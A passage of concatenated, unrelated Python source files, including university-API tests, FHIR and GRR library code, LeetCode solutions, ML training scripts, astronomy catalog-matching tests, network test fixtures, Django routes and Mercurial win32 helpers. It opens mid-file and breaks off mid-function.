def test_careers_invalid_student(self):
"""Check invalid student's schedule."""
student_id = '1234567890'
result = self.ucuenca.schedule(student_id)
self.assertFalse(result)
def _get_schedule(self):
path = os.path.join(TEST_RESOURCES, "schedule.json")
with open(path) as f:
json_file = json.load(f)
return json_file
class GetCurriculumProgressTests(unittest.TestCase):
def setUp(self):
self.ucuenca = Ucuenca()
def test_curriculum_progress(self):
"""Check 0104926787's curriculum progress."""
student_id = '0104926787'
career_id = 44
curriculum_id = 1
career_plan = 4
expected_result = self._get_curriculum_progress()
actual_result = self.ucuenca.curriculum_progress(
student_id, career_id, curriculum_id, career_plan
)
self.assertEqual(actual_result, expected_result)
def test_curriculum_progress_invalid_student(self):
"""Check invalid student's curriculum progress."""
student_id = '1234567890'
career_id = 44
curriculum_id = 1
career_plan = 4
result = self.ucuenca.curriculum_progress(
student_id, career_id, curriculum_id, career_plan
)
self.assertFalse(result)
def _get_curriculum_progress(self):
path = os.path.join(TEST_RESOURCES, "curriculum_progress.json")
with open(path) as f:
json_file = json.load(f)
return json_file
class AuthenticationTests(unittest.TestCase):
def setUp(self):
self.ucuenca = Ucuenca()
def test_bad_password(self):
"""Check authentication with a bad password."""
user = 'santos.gallegos'
passw = '1234'
result = self.ucuenca.authentication(user, passw)
self.assertFalse(result['autenticacion'])
|
from pathlib import Path
from fhir.resources.valueset import ValueSet as _ValueSet
from oops_fhir.utils import ValueSet
__all__ = ["CommonUCUMCodesForAge"]
_resource = _ValueSet.parse_file(Path(__file__).with_suffix(".json"))
class CommonUCUMCodesForAge(ValueSet):
"""
Common UCUM Codes for Age
Unified Code for Units of Measure (UCUM). This value set includes all
UCUM codes
Status: draft - Version: 4.0.1
http://hl7.org/fhir/ValueSet/age-units
"""
# TODO: fix this template issue1
pass
class Meta:
resource = _resource
|
#!/usr/bin/env python
"""Generic parsers (for GRR server and client code)."""
from typing import Iterator
from typing import Text
from typing import Type
from typing import TypeVar
from grr_response_core.lib import factory
from grr_response_core.lib import rdfvalue
from grr_response_core.lib.parsers import abstract
from grr_response_core.lib.util import collection
from grr_response_core.lib.util import precondition
ParseError = abstract.ParseError
Parser = abstract.Parser
SingleResponseParser = abstract.SingleResponseParser
SingleFileParser = abstract.SingleFileParser
MultiResponseParser = abstract.MultiResponseParser
MultiFileParser = abstract.MultiFileParser
_Factory = factory.Factory
_RDFValue = rdfvalue.RDFValue
SINGLE_RESPONSE_PARSER_FACTORY: _Factory[SingleResponseParser[_RDFValue]] = (
_Factory(SingleResponseParser[_RDFValue]))
MULTI_RESPONSE_PARSER_FACTORY: _Factory[MultiResponseParser[_RDFValue]] = (
_Factory(MultiResponseParser[_RDFValue]))
SINGLE_FILE_PARSER_FACTORY: _Factory[SingleFileParser[_RDFValue]] = (
_Factory(SingleFileParser[_RDFValue]))
MULTI_FILE_PARSER_FACTORY: _Factory[MultiFileParser[_RDFValue]] = (
_Factory(MultiFileParser[_RDFValue]))
_P = TypeVar("_P", bound=Parser)
class ArtifactParserFactory(object):
"""A factory wrapper class that yields parsers for specific artifact."""
def __init__(self, artifact_name: Text) -> None:
"""Initializes the artifact parser factory.
Args:
artifact_name: A name of the artifact this factory is supposed to provide
parser instances for.
"""
precondition.AssertType(artifact_name, Text)
self._artifact_name = artifact_name
def HasParsers(self) -> bool:
return (self.HasSingleResponseParsers() or self.HasMultiResponseParsers() or
self.HasSingleFileParsers() or self.HasMultiFileParsers())
def HasSingleResponseParsers(self) -> bool:
return any(self.SingleResponseParserTypes())
def SingleResponseParsers(self) -> Iterator[SingleResponseParser[_RDFValue]]:
return self._CreateSupportedParsers(SINGLE_RESPONSE_PARSER_FACTORY)
def SingleResponseParserTypes(
self) -> Iterator[Type[SingleResponseParser[_RDFValue]]]:
return self._SupportedTypes(SINGLE_RESPONSE_PARSER_FACTORY)
def HasMultiResponseParsers(self) -> bool:
return any(self.MultiResponseParserTypes())
def MultiResponseParsers(self) -> Iterator[MultiResponseParser[_RDFValue]]:
return self._CreateSupportedParsers(MULTI_RESPONSE_PARSER_FACTORY)
def MultiResponseParserTypes(
self) -> Iterator[Type[MultiResponseParser[_RDFValue]]]:
return self._SupportedTypes(MULTI_RESPONSE_PARSER_FACTORY)
def HasSingleFileParsers(self) -> bool:
return any(self.SingleFileParserTypes())
def SingleFileParsers(self) -> Iterator[SingleFileParser[_RDFValue]]:
return self._CreateSupportedParsers(SINGLE_FILE_PARSER_FACTORY)
def SingleFileParserTypes(
self) -> Iterator[Type[SingleFileParser[_RDFValue]]]:
return self._SupportedTypes(SINGLE_FILE_PARSER_FACTORY)
def HasMultiFileParsers(self) -> bool:
return any(self.MultiFileParserTypes())
def MultiFileParsers(self) -> Iterator[MultiFileParser[_RDFValue]]:
return self._CreateSupportedParsers(MULTI_FILE_PARSER_FACTORY)
def MultiFileParserTypes(self) -> Iterator[Type[MultiFileParser[_RDFValue]]]:
return self._SupportedTypes(MULTI_FILE_PARSER_FACTORY)
def AllParserTypes(self) -> Iterator[Type[Parser[_RDFValue]]]:
"""Returns all known parser types applicable for the artifact."""
return collection.Flatten([
self.SingleResponseParserTypes(),
self.MultiResponseParserTypes(),
self.SingleFileParserTypes(),
self.MultiFileParserTypes(),
])
def _CreateSupportedParsers(self, fac: _Factory[_P]) -> Iterator[_P]:
for name in fac.Names():
cls = fac.GetType(name)
if self._artifact_name in cls.supported_artifacts:
yield fac.Create(name)
def _SupportedTypes(self, fac: _Factory[_P]) -> Iterator[Type[_P]]:
for name in fac.Names():
cls = fac.GetType(name)
if self._artifact_name in cls.supported_artifacts:
yield cls
|
from discord.ext import commands
"""
A custom Cooldown type subclassing built in cooldowns from discord.ext commands.
This is a bucket type that allows cooldowns to work based on some text, allowing
things like cooldown on individual `Tags`, or message spam detection.
"""
class MessageTextBucket(commands.BucketType):
custom = 7
def get_key(self, text):
return text
def __call__(self, msg):
return self.get_key(msg)
|
from typing import List
class Solution:
def findGCD(self, nums: List[int]) -> int:
a, b = min(nums), max(nums)
for i in range(a, 1, -1):
if b % i == 0 and a % i == 0:
return i
return 1
|
__source__ = 'https://leetcode.com/problems/insert-into-a-binary-search-tree/'
# Time: O(h) h: height of the tree
# Space: O(h)
#
# Description: Leetcode # 701. Insert into a Binary Search Tree
#
# Given the root node of a binary search tree (BST) and a value to be inserted into the tree,
# insert the value into the BST. Return the root node of the BST after the insertion.
# It is guaranteed that the new value does not exist in the original BST.
#
# Note that there may exist multiple valid ways for the insertion,
# as long as the tree remains a BST after insertion.
# You can return any of them.
#
# For example,
#
# Given the tree:
# 4
# / \
# 2 7
# / \
# 1 3
# And the value to insert: 5
# You can return this binary search tree:
#
# 4
# / \
# 2 7
# / \ /
# 1 3 5
# This tree is also valid:
#
# 5
# / \
# 2 7
# / \
# 1 3
# \
# 4
#
import unittest
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
#108ms 55.06%
class Solution(object):
def insertIntoBST(self, root, val):
"""
:type root: TreeNode
:type val: int
:rtype: TreeNode
"""
if not root:
root = TreeNode(val)
return root
if val > root.val:
root.right = self.insertIntoBST(root.right, val)
else:
root.left = self.insertIntoBST(root.left, val)
return root
#100ms 98.14%
class Solution2(object):
def insertIntoBST(self, root, val):
"""
:type root: TreeNode
:type val: int
:rtype: TreeNode
"""
return Solution2.BST_insert(root, val)
@staticmethod
def BST_insert(root, val):
if root == None:
root = TreeNode(val)
elif root.val < val:
root.right = Solution.BST_insert(root.right, val)
else:
root.left = Solution.BST_insert(root.left, val)
return root
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought:
/**
* Definition for a binary tree node.
* public class TreeNode {
* int val;
* TreeNode left;
* TreeNode right;
* TreeNode(int x) { val = x; }
* }
*/
time complexity of the insertion operation is the same with search operation which is O(h).
Or O(N) in the worst case and O(logN) ideally if the tree is well organized.
The space complexity of the recursion soultion is O(h) as well.
In other word, O(N) in the worst case and O(logN) ideally.
If you implement the algorithm iteratively, the space complexity can be O(1).
# Recursion
# 1ms 100%
class Solution {
public TreeNode insertIntoBST(TreeNode root, int val) {
if (root == null) return new TreeNode(val);
if (val < root.val) {
root.left = insertIntoBST(root.left, val);
} else {
root.right = insertIntoBST(root.right, val);
}
return root;
}
}
Ex: [7,3,9,2,5], insert 4,
the new BST will be : [7,3,9,2,5,null,null,null,null,4]. no need to balance
# Iteration
# 1ms 100%
class Solution {
public TreeNode insertIntoBST(TreeNode root, int val) {
if(root == null) return new TreeNode(val);
TreeNode cur = root;
while(true) {
if(cur.val <= val) {
if(cur.right != null) cur = cur.right;
else {
cur.right = new TreeNode(val);
break;
}
} else {
if(cur.left != null) cur = cur.left;
else {
cur.left = new TreeNode(val);
break;
}
}
}
return root;
}
}
'''
|
from flask import Flask, json
import logging
def log_exception(sender, exception, **extra):
sender.logger.debug('Got exception during processing: %s', exception)
def create_app(config_file):
#Instantiating Flask and appling config
app = Flask(__name__)
app.config.from_object(config_file)
from app import api_bp
app.register_blueprint(api_bp, url_prefix='/api')
#Or db = SQLAlchemy(app) then use this db ref in model definition
from model import db
db.init_app(app)
@app.route('/')
def index():
pass
@app.route('/isAlive')
def is_alive():
res = app.response_class(
response=json.dumps('Case Service API is healthy'),
mimetype='application/json'
)
return res
return app
if __name__ == "__main__":
app = create_app("config")
app.run(debug=True, host='0.0.0.0', port='8000')
|
#!/usr/bin/env python3
"""This is an example to train a task with TRPO algorithm.
Here it runs CubeCrash-v0 environment with 100 iterations.
"""
import click
import gym
from metarl import wrap_experiment
from metarl.envs import MetaRLEnv, normalize
from metarl.experiment import LocalTFRunner
from metarl.experiment.deterministic import set_seed
from metarl.tf.algos import TRPO
from metarl.tf.baselines import GaussianCNNBaseline
from metarl.tf.policies import CategoricalCNNPolicy
@click.command()
@click.option('--batch_size', type=int, default=4000)
@wrap_experiment
def trpo_cubecrash(ctxt=None, seed=1, batch_size=4000):
"""Train TRPO with CubeCrash-v0 environment.
Args:
ctxt (metarl.experiment.ExperimentContext): The experiment
configuration used by LocalRunner to create the snapshotter.
seed (int): Used to seed the random number generator to produce
determinism.
batch_size (int): Number of timesteps to use in each training step.
"""
set_seed(seed)
with LocalTFRunner(ctxt) as runner:
env = MetaRLEnv(normalize(gym.make('CubeCrash-v0')))
policy = CategoricalCNNPolicy(env_spec=env.spec,
filters=((32, (8, 8)), (64, (4, 4))),
strides=(4, 2),
padding='VALID',
hidden_sizes=(32, 32))
baseline = GaussianCNNBaseline(
env_spec=env.spec,
regressor_args=dict(filters=((32, (8, 8)), (64, (4, 4))),
strides=(4, 2),
padding='VALID',
hidden_sizes=(32, 32),
use_trust_region=True))
algo = TRPO(env_spec=env.spec,
policy=policy,
baseline=baseline,
max_path_length=100,
discount=0.99,
gae_lambda=0.95,
lr_clip_range=0.2,
policy_ent_coeff=0.0,
flatten_input=False)
runner.setup(algo, env)
runner.train(n_epochs=100, batch_size=batch_size)
trpo_cubecrash()
|
"""
mpld3 Utilities
===============
Utility routines for the mpld3 package
"""
import os
import re
import shutil
import warnings
from functools import wraps
from . import urls
# Make sure that DeprecationWarning gets printed
warnings.simplefilter("always", DeprecationWarning)
def html_id_ok(objid, html5=False):
"""Check whether objid is valid as an HTML id attribute.
If html5 == True, then use the more liberal html5 rules.
"""
if html5:
return not re.search('\s', objid)
else:
return bool(re.match("^[a-zA-Z][a-zA-Z0-9\-\.\:\_]*$", objid))
def get_id(obj, suffix="", prefix="el", warn_on_invalid=True):
"""Get a unique id for the object"""
if not suffix:
suffix = ""
if not prefix:
prefix = ""
objid = prefix + str(os.getpid()) + str(id(obj)) + suffix
if warn_on_invalid and not html_id_ok(objid):
warnings.warn('"{0}" is not a valid html ID. This may cause problems')
return objid
def deprecated(func, old_name, new_name):
"""Decorator to mark functions as deprecated."""
@wraps(func)
def new_func(*args, **kwargs):
warnings.warn(("{0} is deprecated and will be removed. "
"Use {1} instead".format(old_name, new_name)),
category=DeprecationWarning)
return func(*args, **kwargs)
new_func.__doc__ = ("*%s is deprecated: use %s instead*\n\n "
% (old_name, new_name)) + new_func.__doc__
return new_func
def write_ipynb_local_js(location=None, d3_src=None, mpld3_src=None):
"""
Write the mpld3 and d3 javascript libraries to the given file location.
This utility is used by the IPython notebook tools to enable easy use
of mpld3 with no web connection.
Parameters
----------
location : string (optioal)
the directory in which the d3 and mpld3 javascript libraries will be
written. If not specified, the IPython nbextensions directory will be
used. If IPython doesn't support nbextensions (< 2.0),
the current working directory will be used.
d3_src : string (optional)
the source location of the d3 library. If not specified, the standard
path in mpld3.urls.D3_LOCAL will be used.
mpld3_src : string (optional)
the source location of the mpld3 library. If not specified, the
standard path in mpld3.urls.MPLD3_LOCAL will be used.
Returns
-------
d3_url, mpld3_url : string
The URLs to be used for loading these js files.
"""
if location is None:
try:
from IPython.html import install_nbextension
except ImportError:
location = os.getcwd()
nbextension = False
else:
nbextension = True
else:
nbextension = False
if d3_src is None:
d3_src = urls.D3_LOCAL
if mpld3_src is None:
mpld3_src = urls.MPLD3_LOCAL
d3js = os.path.basename(d3_src)
mpld3js = os.path.basename(mpld3_src)
if not os.path.exists(d3_src):
raise ValueError("d3 src not found at '{0}'".format(d3_src))
if not os.path.exists(mpld3_src):
raise ValueError("mpld3 src not found at '{0}'".format(mpld3_src))
if nbextension:
# IPython 2.0+.
# This will not work if a url prefix is added
prefix = '/nbextensions/'
try:
install_nbextension([d3_src, mpld3_src])
except IOError:
# files may be read only. We'll try deleting them and re-installing
from IPython.utils.path import get_ipython_dir
nbext = os.path.join(get_ipython_dir(), "nbextensions")
for src in [d3_src, mpld3_src]:
dest = os.path.join(nbext, os.path.basename(src))
if os.path.exists(dest):
os.remove(dest)
install_nbextension([d3_src, mpld3_src])
else:
# IPython < 2.0 or explicit path.
# This won't work if users have changed the kernel directory.
prefix = '/files/'
d3_dest = os.path.join(location, d3js)
mpld3_dest = os.path.join(location, mpld3js)
for src, dest in [(d3_src, d3_dest), (mpld3_src, mpld3_dest)]:
try:
shutil.copyfile(src, dest)
except IOError:
# file may be read only. We'll try deleting it first
if os.path.exists(dest):
os.remove(dest)
shutil.copyfile(src, dest)
return prefix + d3js, prefix + mpld3js
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from operations import FactorizedReduce, StdConv, MixedOp
class Cell(nn.Module):
""" Cell for search
Each edge is mixed and continuous relaxed.
"""
def __init__(self, num_nodes, c_prev_prev, c_prev, c_cur, reduction_prev, reduction_cur, search_space):
"""
Args:
num_nodes: Number of intermediate cell nodes
c_prev_prev: channels_out[k-2]
c_prev : Channels_out[k-1]
c_cur : Channels_in[k] (current)
reduction_prev: flag for whether the previous cell is reduction cell or not
reduction_cur: flag for whether the current cell is reduction cell or not
"""
super(Cell, self).__init__()
self.reduction_cur = reduction_cur
self.num_nodes = num_nodes
# If previous cell is reduction cell, current input size does not match with
# output size of cell[k-2]. So the output[k-2] should be reduced by preprocessing
if reduction_prev:
self.preprocess0 = FactorizedReduce(c_prev_prev, c_cur)
else:
self.preprocess0 = StdConv(c_prev_prev, c_cur, kernel_size=1, stride=1, padding=0)
self.preprocess1 = StdConv(c_prev, c_cur, kernel_size=1, stride=1, padding=0)
# Generate dag from mixed operations
self.dag_ops = nn.ModuleList()
for i in range(self.num_nodes):
self.dag_ops.append(nn.ModuleList())
# Include 2 input nodes
for j in range(2+i):
# Reduction with stride = 2 must be only for the input node
stride = 2 if reduction_cur and j < 2 else 1
op = MixedOp(c_cur, stride, search_space)
self.dag_ops[i].append(op)
def forward(self, s0, s1, w_dag):
s0 = self.preprocess0(s0)
s1 = self.preprocess1(s1)
states = [s0, s1]
for edges, w_list in zip(self.dag_ops, w_dag):
state_cur = sum(edges[i](s, w) for i, (s, w) in enumerate((zip(states, w_list))))
states.append(state_cur)
state_out = torch.cat(states[2:], dim=1)
return state_out
class NetworkCNN(nn.Module):
def __init__(self, init_channels, input_channels, num_classes,
num_layers, criterion, search_space, num_nodes, stem_multiplier):
super(NetworkCNN, self).__init__()
self.init_channels = init_channels
self.num_classes = num_classes
self.num_layers = num_layers
self.criterion = criterion
# TODO: Algorithm settings?
self.num_nodes = num_nodes
self.stem_multiplier = stem_multiplier
c_cur = self.stem_multiplier*self.init_channels
self.stem = nn.Sequential(
nn.Conv2d(input_channels, c_cur, 3, padding=1, bias=False),
nn.BatchNorm2d(c_cur)
)
# In first Cell stem is used for s0 and s1
# c_prev_prev and c_prev - output channels size
# c_cur - init channels size
c_prev_prev, c_prev, c_cur = c_cur, c_cur, self.init_channels
self.cells = nn.ModuleList()
reduction_prev = False
for i in range(self.num_layers):
# For Network with 1 layer: Only Normal Cell
if self.num_layers == 1:
reduction_cur = False
else:
# For Network with two layers: First layer - Normal, Second - Reduction
# For Other Networks: [1/3, 2/3] Layers - Reduction cell with double channels
# Others - Normal cell
if ((self.num_layers == 2 and i == 1) or
(self.num_layers > 2 and i in [self.num_layers//3, 2*self.num_layers//3])):
c_cur *= 2
reduction_cur = True
else:
reduction_cur = False
cell = Cell(self.num_nodes, c_prev_prev, c_prev, c_cur, reduction_prev, reduction_cur, search_space)
reduction_prev = reduction_cur
self.cells.append(cell)
c_cur_out = c_cur * self.num_nodes
c_prev_prev, c_prev = c_prev, c_cur_out
self.global_pooling = nn.AdaptiveAvgPool2d(1)
self.classifier = nn.Linear(c_prev, self.num_classes)
# Initialize alphas parameters
num_ops = len(search_space.primitives)
self.alpha_normal = nn.ParameterList()
self.alpha_reduce = nn.ParameterList()
for i in range(self.num_nodes):
self.alpha_normal.append(nn.Parameter(1e-3*torch.randn(i+2, num_ops)))
if self.num_layers > 1:
self.alpha_reduce.append(nn.Parameter(1e-3*torch.randn(i+2, num_ops)))
# Setup alphas list
self.alphas = []
for name, parameter in self.named_parameters():
if "alpha" in name:
self.alphas.append((name, parameter))
def forward(self, x):
weights_normal = [F.softmax(alpha, dim=-1) for alpha in self.alpha_normal]
weights_reduce = [F.softmax(alpha, dim=-1) for alpha in self.alpha_reduce]
s0 = s1 = self.stem(x)
for cell in self.cells:
weights = weights_reduce if cell.reduction_cur else weights_normal
s0, s1 = s1, cell(s0, s1, weights)
out = self.global_pooling(s1)
# Make out flatten
out = out.view(out.size(0), -1)
logits = self.classifier(out)
return logits
def print_alphas(self):
print("\n>>> Alphas Normal <<<")
for alpha in self.alpha_normal:
print(F.softmax(alpha, dim=-1))
if self.num_layers > 1:
print("\n>>> Alpha Reduce <<<")
for alpha in self.alpha_reduce:
print(F.softmax(alpha, dim=-1))
print("\n")
def getWeights(self):
return self.parameters()
def getAlphas(self):
for _, parameter in self.alphas:
yield parameter
def loss(self, x, y):
logits = self.forward(x)
return self.criterion(logits, y)
def genotype(self, search_space):
gene_normal = search_space.parse(self.alpha_normal, k=2)
gene_reduce = search_space.parse(self.alpha_reduce, k=2)
# concat all intermediate nodes
concat = range(2, 2 + self.num_nodes)
return search_space.genotype(normal=gene_normal, normal_concat=concat,
reduce=gene_reduce, reduce_concat=concat)
|
#!/usr/bin/python
from Bio import SeqIO
|
import os
import skylink
from skylink import testing
import numpy as np
from astropy.table import Table
import FoFCatalogMatching
import pytest # noqa
# TODO: test the matching with more than two catalogs
# TODO: test N-way matching with `linking_lengths` as a dictionary
# TODO: test if we catch illegal footprints that are not gnomonic-projectable
# TODO: test MPI implementation
# TODO: test a wide range of linking lengths
graph_lib = "networkx"
ncpus_max = os.cpu_count() # maximum number of cpus
linking_lengths_default = 0.75 # arcsec
n = 2_000 # number of objects for the mock-up data
def make_mockup():
def tnormal(mu=None, sigma=None, n=None, lower=-0.5, upper=0.5):
return np.clip(np.random.normal(np.repeat(mu, n), sigma), lower, upper)
np.random.seed(2)
ra = np.random.uniform(4, 6, n)
dec = np.random.uniform(-1, 1, n)
cat_a = Table({"ra": ra, "dec": dec})
cat_b = Table(
{
"ra": np.append(ra + tnormal(0, 0.0004, n), ra + tnormal(0, 0.0001, n)),
"dec": np.append(dec + tnormal(0, 0.0002, n), dec + tnormal(0, 0.0002, n)),
}
)
return cat_a, cat_b
def run_FoFCatalogMatching(cat_a, cat_b, return_pandas=False):
""" Genetare an output using `FoFCatalogMatching` as our benchmark """
res_fcm = FoFCatalogMatching.match(
{"a": cat_a, "b": cat_b}, linking_lengths_default
)
if return_pandas:
return res_fcm.to_pandas()
else:
return res_fcm
def test_graph_lib():
cat_a, cat_b = make_mockup()
res_fcm = run_FoFCatalogMatching(cat_a, cat_b, return_pandas=True)
res_sl = skylink.match(
{"a": cat_a, "b": cat_b},
linking_lengths=linking_lengths_default,
graph_lib=graph_lib,
nprocs=ncpus_max,
silent=True,
return_pandas=True,
use_linked_mask=False,
)
testing.assert_equal(res_fcm, res_sl)
def run_with_ncpus(cat_a, cat_b, ncpus):
return skylink.match(
{"a": cat_a, "b": cat_b},
linking_lengths=linking_lengths_default,
graph_lib=graph_lib,
nprocs=ncpus,
silent=True,
return_pandas=True,
use_linked_mask=False,
)
def test_nprocs():
# TODO: test equality with more than 2 catalogs
cat_a, cat_b = make_mockup()
res_fcm = run_FoFCatalogMatching(cat_a, cat_b, return_pandas=True)
res_sl1 = run_with_ncpus(cat_a, cat_b, 1)
res_sl2 = run_with_ncpus(cat_a, cat_b, 2)
res_sl3 = run_with_ncpus(cat_a, cat_b, ncpus_max)
testing.assert_equal(res_fcm, res_sl1)
testing.assert_equal(res_sl1, res_sl2)
testing.assert_equal(res_sl2, res_sl3)
def run_with_overlap(cat_a, cat_b, overlap):
return skylink.match(
{"a": cat_a, "b": cat_b},
linking_lengths=linking_lengths_default,
graph_lib=graph_lib,
overlap=overlap,
nprocs=ncpus_max,
silent=True,
return_pandas=True,
use_linked_mask=False,
)
def test_overlap():
cat_a, cat_b = make_mockup()
res_fcm = run_FoFCatalogMatching(cat_a, cat_b, return_pandas=True)
res_sl1 = run_with_overlap(cat_a, cat_b, 1.0)
res_sl2 = run_with_overlap(cat_a, cat_b, 1.1)
res_sl3 = run_with_overlap(cat_a, cat_b, 1.2)
testing.assert_equal(res_fcm, res_sl1)
testing.assert_equal(res_sl1, res_sl2)
testing.assert_equal(res_sl2, res_sl3)
def run_with_linked_mask(cat_a, cat_b, use_linked_mask):
return skylink.match(
{"a": cat_a, "b": cat_b},
linking_lengths=linking_lengths_default,
graph_lib=graph_lib,
use_linked_mask=use_linked_mask,
nprocs=ncpus_max,
silent=True,
return_pandas=True,
)
@pytest.mark.skip(
reason="FIXME: The `networkx` graph library does not give the right results with use_linked_mask=True"
)
def test_linked_mask():
cat_a, cat_b = make_mockup()
res_fcm = run_FoFCatalogMatching(cat_a, cat_b, return_pandas=True)
res_sl1 = run_with_linked_mask(cat_a, cat_b, True)
res_sl2 = run_with_linked_mask(cat_a, cat_b, False)
testing.assert_equal(res_fcm, res_sl1)
testing.assert_equal(res_sl1, res_sl2)
def run_with_order(cat_a, cat_b, reverse=False):
cats = {"b": cat_b, "a": cat_a} if reverse else {"a": cat_a, "b": cat_b}
return skylink.match(
cats,
linking_lengths=linking_lengths_default,
graph_lib=graph_lib,
nprocs=ncpus_max,
silent=True,
return_pandas=True,
use_linked_mask=False,
)
def test_cat_orders():
cat_a, cat_b = make_mockup()
res_fcm = run_FoFCatalogMatching(cat_a, cat_b, return_pandas=True)
res_sl1 = run_with_order(cat_a, cat_b, False)
res_sl2 = run_with_order(cat_a, cat_b, True)
testing.assert_equal(res_fcm, res_sl1)
testing.assert_equal(res_sl1, res_sl2)
def run_with_sort(cat_a, cat_b, sort):
return skylink.match(
{"a": cat_a, "b": cat_b},
linking_lengths=linking_lengths_default,
graph_lib=graph_lib,
sort=sort,
nprocs=ncpus_max,
silent=True,
return_pandas=True,
use_linked_mask=False,
)
def test_sort():
cat_a, cat_b = make_mockup()
res_fcm = run_FoFCatalogMatching(cat_a, cat_b, return_pandas=True)
res_sl1 = run_with_sort(cat_a, cat_b, True)
res_sl2 = run_with_sort(cat_a, cat_b, False)
testing.assert_equal(res_fcm, res_sl1)
testing.assert_equal(res_sl1, res_sl2)
def run_with_storekdtree(cat_a, cat_b, storekdtree):
return skylink.match(
{"a": cat_a, "b": cat_b},
linking_lengths=linking_lengths_default,
graph_lib=graph_lib,
storekdtree=storekdtree,
nprocs=ncpus_max,
silent=True,
return_pandas=True,
use_linked_mask=False,
)
def test_storekdtree():
cat_a, cat_b = make_mockup()
res_fcm = run_FoFCatalogMatching(cat_a, cat_b, return_pandas=True)
res_sl2 = run_with_storekdtree(cat_a, cat_b, False)
res_sl1 = run_with_storekdtree(cat_a, cat_b, True)
testing.assert_equal(res_fcm, res_sl1)
testing.assert_equal(res_sl1, res_sl2)
|
import argparse
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument(
'--model_dir', default='./text_training',
help='Output directory for model and training stats.')
parser.add_argument(
'--data_dir', default='./text_data',
help='Directory to download the data to.')
parser.add_argument('--model', default='convolutional')
parser.add_argument('--number_of_filters', default="16,8,8")
parser.add_argument('--dense_layers', default="1:1024,2:512", type=str)
parser.add_argument('--number_of_tokens', default=144, type=int)
parser.add_argument('--is_l2_normed', default=True, type=str2bool)
parser.add_argument(
'--batch_size', type=int, default=64,
help='Batch size (default: 256)')
parser.add_argument(
'--noise_factor', type=float, default=0.5,
help='Amount of noise to add to input (default: 0)')
parser.add_argument(
'--dropout', type=float, default=0.5,
help='The probability that each element is kept in dropout layers (default: 1)')
parser.add_argument(
'--loss', type=str, default="custom_distance_loss")
parser.add_argument(
'--learning_rate', type=float, default=0.001,
help='Learning rate (default: 0.001)')
parser.add_argument(
'--epochs', type=int, default=50,
help='Number of epochs to perform for training (default: 50)')
parser.add_argument(
'--weight_decay', type=float, default=1e-5,
help='Amount of weight decay to apply (default: 1e-5)')
parser.add_argument(
'--save_images',
help='Path to directory to store intermediate reconstructed images (default: disabled)')
parser.add_argument(
'--images', type=int, default=10,
help='Number of test images to reconstruct (default: 10)')
parser.add_argument(
'--what', choices=['reconstruction', 'embedding'],
default='embedding',
help='Whether to display reconstructed images or '
'create checkpoint with encoder output to visualize '
'in TensorBoard.')
return parser
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def extract_number_of_filters(number_of_filters_as_arg):
return [int(filter.strip()) for filter in number_of_filters_as_arg.split(',')]
|
import pytest
import logging
import time
from tests.common.dualtor.dual_tor_utils import get_crm_nexthop_counter # lgtm[py/unused-import]
from tests.common.helpers.assertions import pytest_assert as py_assert
from tests.common.fixtures.ptfhost_utils import change_mac_addresses, run_garp_service
CRM_POLL_INTERVAL = 1
CRM_DEFAULT_POLL_INTERVAL = 300
@pytest.fixture
def set_crm_polling_interval(rand_selected_dut):
"""
A function level fixture to set crm polling interval to 1 second
"""
wait_time = 2
logging.info("Setting crm polling interval to {} seconds".format(CRM_POLL_INTERVAL))
rand_selected_dut.command("crm config polling interval {}".format(CRM_POLL_INTERVAL))
logging.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
yield
logging.info("Setting crm polling interval to {} seconds".format(CRM_DEFAULT_POLL_INTERVAL))
rand_selected_dut.command("crm config polling interval {}".format(CRM_DEFAULT_POLL_INTERVAL))
@pytest.fixture
def verify_crm_nexthop_counter_not_increased(rand_selected_dut, set_crm_polling_interval):
"""
A function level fixture to verify crm nexthop counter not increased
"""
original_counter = get_crm_nexthop_counter(rand_selected_dut)
logging.info("Before test: crm nexthop counter = {}".format(original_counter))
yield
time.sleep(CRM_POLL_INTERVAL)
diff = get_crm_nexthop_counter(rand_selected_dut) - original_counter
logging.info("Before test: crm nexthop counter = {}".format(original_counter + diff))
py_assert(diff <= 0, "crm nexthop counter is increased by {}.".format(diff))
def pytest_addoption(parser):
"""
Adds pytest options that are used by dual ToR tests
"""
dual_tor_group = parser.getgroup("Dual ToR test suite options")
dual_tor_group.addoption(
"--mux-stress-count",
action="store",
default=2,
type=int,
help="The number of iterations for mux stress test"
)
@pytest.fixture(scope="module", autouse=True)
def common_setup_teardown(request, tbinfo, vmhost):
if 'dualtor' in tbinfo['topo']['name']:
request.getfixturevalue('run_garp_service')
vmhost.shell('systemctl restart mux-simulator')
|
from __future__ import division
from libtbx.clear_paths \
import remove_or_rename_files_and_directories_if_possible
import sys
def run(args):
remaining = remove_or_rename_files_and_directories_if_possible(paths=args)
for path in remaining:
"WARNING: unable to remove or rename:", path
if (__name__ == "__main__"):
run(args=sys.argv[1:])
|
from django.urls import path
from . import views
urlpatterns = [
path('open-account/',
views.OpenAccountAPIView.as_view(),
name='open_account'),
path('delete-account/<pk>/',
views.DeleteAccountAPIView.as_view(),
name='delete_account'),
path('deposit/<pk>/',
views.DepositAPIView.as_view(),
name='deposit'),
path('withdraw/<pk>/',
views.WithdrawAPIView.as_view(),
name='withdraw'),
path('transfer/<pk>/',
views.TransferAPIView.as_view(),
name='transfer'),
path('create-branch/',
views.CreateBranchAPIView.as_view(),
name='create_branch')
]
|
# win32.py - utility functions that use win32 API
#
# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
"""Utility functions that use win32 API.
Mark Hammond's win32all package allows better functionality on
Windows. This module overrides definitions in util.py. If not
available, import of this module will fail, and generic code will be
used.
"""
import win32api
import errno, os, sys, pywintypes, win32con, win32file, win32process
import winerror, win32gui
import osutil, encoding
from win32com.shell import shell, shellcon
def os_link(src, dst):
try:
win32file.CreateHardLink(dst, src)
# CreateHardLink sometimes succeeds on mapped drives but
# following nlinks() returns 1. Check it now and bail out.
if nlinks(src) < 2:
try:
win32file.DeleteFile(dst)
except:
pass
# Fake hardlinking error
